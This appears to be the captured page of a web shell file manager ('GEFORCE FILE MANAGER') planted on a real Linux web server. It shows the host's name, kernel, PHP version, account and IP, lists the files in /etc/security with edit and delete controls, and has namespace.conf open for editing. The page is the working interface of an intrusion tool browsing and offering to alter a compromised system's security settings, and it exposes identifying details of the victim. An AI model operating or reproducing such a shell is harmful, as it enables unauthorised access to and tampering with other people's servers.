[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
etc
/
security
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 console.apps
SET
[ DEL ]
📁 console.perms.d
SET
[ DEL ]
📁 limits.d
SET
[ DEL ]
📁 namespace.d
SET
[ DEL ]
📁 pwquality.conf.d
SET
[ DEL ]
📄 access.conf
4,564 B
SET
[ EDIT ]
|
[ DEL ]
📄 acronisagent.conf
5 B
SET
[ EDIT ]
|
[ DEL ]
📄 chroot.conf
82 B
SET
[ EDIT ]
|
[ DEL ]
📄 console.handlers
624 B
SET
[ EDIT ]
|
[ DEL ]
📄 console.perms
939 B
SET
[ EDIT ]
|
[ DEL ]
📄 faillock.conf
2,232 B
SET
[ EDIT ]
|
[ DEL ]
📄 group.conf
3,635 B
SET
[ EDIT ]
|
[ DEL ]
📄 limits.conf
2,422 B
SET
[ EDIT ]
|
[ DEL ]
📄 namespace.conf
1,440 B
SET
[ EDIT ]
|
[ DEL ]
📄 namespace.init
1,971 B
SET
[ EDIT ]
|
[ DEL ]
📄 opasswd
0 B
SET
[ EDIT ]
|
[ DEL ]
📄 pam_env.conf
2,972 B
SET
[ EDIT ]
|
[ DEL ]
📄 pwhistory.conf
517 B
SET
[ EDIT ]
|
[ DEL ]
📄 pwquality.conf
2,674 B
SET
[ EDIT ]
|
[ DEL ]
📄 sepermit.conf
419 B
SET
[ EDIT ]
|
[ DEL ]
📄 time.conf
2,179 B
SET
[ EDIT ]
|
[ DEL ]
📄 user_map.conf
247 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: namespace.conf
# /etc/security/namespace.conf # # See /usr/share/doc/pam-*/txts/README.pam_namespace for more information. # # Uncommenting the following three lines will polyinstantiate # /tmp, /var/tmp and user's home directories. /tmp and /var/tmp will # be polyinstantiated based on the MLS level part of the security context as well as user # name, Polyinstantion will not be performed for user root and adm for directories # /tmp and /var/tmp, whereas home directories will be polyinstantiated for all users. # The user name and context is appended to the instance prefix. # # Note that instance directories do not have to reside inside the # polyinstantiated directory. In the examples below, instances of /tmp # will be created in /tmp-inst directory, where as instances of /var/tmp # and users home directories will reside within the directories that # are being polyinstantiated. # # Instance parent directories must exist for the polyinstantiation # mechanism to work. By default, they should be created with the mode # of 000. pam_namespace module will enforce this mode unless it # is explicitly called with an argument to ignore the mode of the # instance parent. System administrators should use this argument with # caution, as it will reduce security and isolation achieved by # polyinstantiation. # #/tmp /tmp-inst/ level root,adm #/var/tmp /var/tmp/tmp-inst/ level root,adm #$HOME $HOME/$USER.inst/ level